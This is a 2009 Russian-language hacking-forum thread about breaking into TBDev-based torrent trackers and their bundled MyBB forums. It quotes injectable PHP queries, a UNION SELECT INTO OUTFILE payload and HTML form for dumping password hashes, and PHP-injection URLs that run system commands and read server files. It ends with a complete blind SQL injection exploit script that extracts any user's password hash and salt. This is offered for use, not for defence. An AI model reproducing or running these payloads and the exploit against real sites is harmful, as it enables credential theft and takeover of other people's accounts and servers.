ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.03.2009, 19:44
|
|
Новичок
Регистрация: 30.12.2008
Сообщений: 1
Провел на форуме:
33750
Репутация:
0
|
|
Сообщение от RaMTararam
Мой аккаунт отключили и надо как то занова врубить его...
Новый не регит, выдает что данный ip зареген
Можно ли что либо сделать в данной ситуации??
Сотрей cookies и попрупай опять зарегится
|
|
|
10.04.2009, 12:50
|
|
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме:
95382
Репутация:
29
|
|
По моему не было.
Мод AJAX проверка занятости e-mail и никнейма.
Бажные куски кода:
PHP код:
$res = (@mysql_fetch_row(@sql_query("select count(*) from users where username='$wantusername'"))) or die(mysql_error());
и
PHP код:
$res = (@mysql_fetch_row(@sql_query("select count(*) from users where email='$email'"))) or die(mysql_error());
Через данные уязвимости можно стырить пассхеш любого пользователя но как показала практика при запросе вида ' union select passhash from users where id=1 into outfile '../../../usr/local/www/torrent/torrents/images/1.txt'/* -- @ukrnet.ua
Стандартный JS убивает = поэтому создаем на каком нибудь сервере страничку с содержанием
Код:
<form method="POST" action="http://АДРЕС_ТРЕКЕРА/check_signup.php">
<input type="text" name="user name" size="20">
<input type="text" name="emai l" size="20">
<input type="submit" value="go">
</form>
Вставляем в любое из полей SQL запрос и получаем в фаил 1.txt пассхеш.
P.S. При юзании данной уязвимости можно столкнутся с тем что веб сервер "изолирован" и тогда MySQL выдаст ошибку о не возможности сохранить фаил. Поэтому вопрос можно ли как нибудь составить SQL запрос чтобы он пассхеш вывел на экран? 
Последний раз редактировалось Rostov114; 12.04.2009 в 14:00..
|
|
|
|
10.04.2009, 16:44
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Если нет вывода, кроме mysql_error, можешь посмотреть мой сплоит, гдето на 1-4 странице, последняя версия. Если есть вывод, то как обычно.
Вообще, ещё раз перечитай (если читал): https://forum.antichat.ru/thread43966.html
Мой сплоит работает по методу описаному в пункте 3.3
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
23.04.2009, 02:03
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 5
Провел на форуме:
31427
Репутация:
0
|
|
Qwazar скажи пожалуйста через какие доки моно просунуть SQL inj ... кроме тех что ты дал..
|
|
|
|
23.04.2009, 04:31
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Вместе с этим трекером идет станартный форум mybb,там есть php inj
http://sait.ru/torrent/forum/forumdisplay.php?fid=2
&sortby='];system('dir C:\\');exit;//
ИТД
Можно файлы читать
http://sait.ru/torrent/forum/forumdisplay.php?fid=2
&sortby='];readfile('C:/boot.ini');exit;//
Ну вообщем смотря в каком случае. Можно шелл заюзать.
P.S.Это так если инъекция не прет.  |
|
|
|
23.04.2009, 09:58
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от foot
Qwazar скажи пожалуйста через какие доки моно просунуть SQL inj ... кроме тех что ты дал..
Ищи То что я нашёл выше уже устарело, а больше я пока не смотрел.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
24.04.2009, 23:17
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 34
Провел на форуме:
150392
Репутация:
8
|
|
Возможно ли сменить пароль если я сижу на торрент акке? Просто нету формы для смены пароля...
|
|
|
|
25.04.2009, 23:45
|
|
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме:
95382
Репутация:
29
|
|
Сообщение от Qwazar
Если нет вывода, кроме mysql_error, можешь посмотреть мой сплоит, гдето на 1-4 странице, последняя версия. Если есть вывод, то как обычно.
Вообще, ещё раз перечитай (если читал): https://forum.antichat.ru/thread43966.html
Мой сплоит работает по методу описаному в пункте 3.3 Ага спасибо..щас на основе твоего сплоита попытаюсь написать под свою багу.
|
|
|
|
26.04.2009, 00:50
|
|
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме:
95382
Репутация:
29
|
|
При запросе вида ' union select passhash from users where id=1 into outfile '../../../usr/local/www/torrent/torrents/images/1.txt' -- @ukrnet.ua в моей узвимости сервер может ответить Access denied for user 'torrent_hack'@'localhost' (using password: YES). Что означает что он не в состоянии записать фаил на винчестер поэтому написал сплоит на основе сплоита от Qwazar.
PHP код:
<?
//TBDev2 Blind SQL Injection Exploit by Qwazar
//Greets: +toxa+ & antichat.ru & Rostov114
set_time_limit(0);
ignore_user_abort(1);
Error_Reporting(E_ALL & ~E_NOTICE);
function send_xpl($url, $xpl){
global $id;
$u=parse_url($url);
$data = "action=email&email={$xpl}";
$req = "POST ".$u['path']."check_signup.php HTTP/1.1\r\n";
$req .= "Host: ".$u['host']."\r\n";
$req .= "Content-Length: ".strlen($data)."\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Connection: close\r\n\r\n";
$req .= $data;
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
while (!feof($fs)) {
$res .= fread($fs, 8192);
}
fclose($fs);
return $res;
}
function xpl($field, $condition, $pos){
global $id;
$xpl="-1'+or+id=if(ascii(substring((select+$field+from+use rs+where+id=$id),$pos,1))$condition,'1',(select+1+ union+select+2))+--+";
return $xpl;
}
function cond($url, $field, $cond, $pos, $ch) {
if(!preg_match('/Subquery returns/', send_xpl($url, xpl($field,$cond.$ch,$pos))))
return 1;
else
return 0;
}
function isVulnerable($url) {
if(preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1))))
return true;
else
return false;
}
function getChar($url, $field, $pos, $lb=0, $ub=255) {
while(true) {
$M = floor($lb + ($ub-$lb)/2);
if(cond($url, $field, '<', $pos, $M)==1) {
$ub = $M - 1;
}
else if(cond($url, $field, '>', $pos, $M)==1) {
$lb = $M + 1;
}
else
return chr($M);
if($lb > $ub)
return -1;
}
}
if($argc<2)
{
echo "==================\r\n";
echo "Using tbdev2sql.php url target_id\r\ntarget_id - id of target member\r\n\r\n\r\nEx.: tbdev2xpl.php http://www.site.com/ 1\r\n";
echo "==================\r\n";
die();
}
$url=$argv[1];
$id=$argv[2];
echo $url.":".$id."\r\n";
if(!isVulnerable($url))
die("Exploit failed: Target is not vulnerable");
echo "Trying to get passhash: ";
for($i=1;$i<=32;$i++){
$c = getChar($url, "passhash", $i, 47, 103);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
echo "Trying to get salt: ";
for($i=1;$i<=20;$i++){
$c = getChar($url, "secret", $i);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
?>
Использовать так же как и сплоит Qwazar-а только в этом сплоите не нужен аккаут зарегестрированого пользователя.
P.S. Для тех кто в танке Exploit failed: Target is not vulnerable - означает что дыру прикрыли.
Последний раз редактировалось Rostov114; 26.04.2009 в 13:33..
|
|
|
|
26.04.2009, 01:55
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Кстати, в функции function isVulnerable($url) - проверка на то уязвим сервер или нет происходит неверно, эта функция возвращает 1 или 2, т.е. всегда true Т.е. по сути проверка всегда проходит успешно.
З.Ы.
Да, это моя бага, но лучше исправить, чтобы не заваливать неуязвимый сервер тучей запросов.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
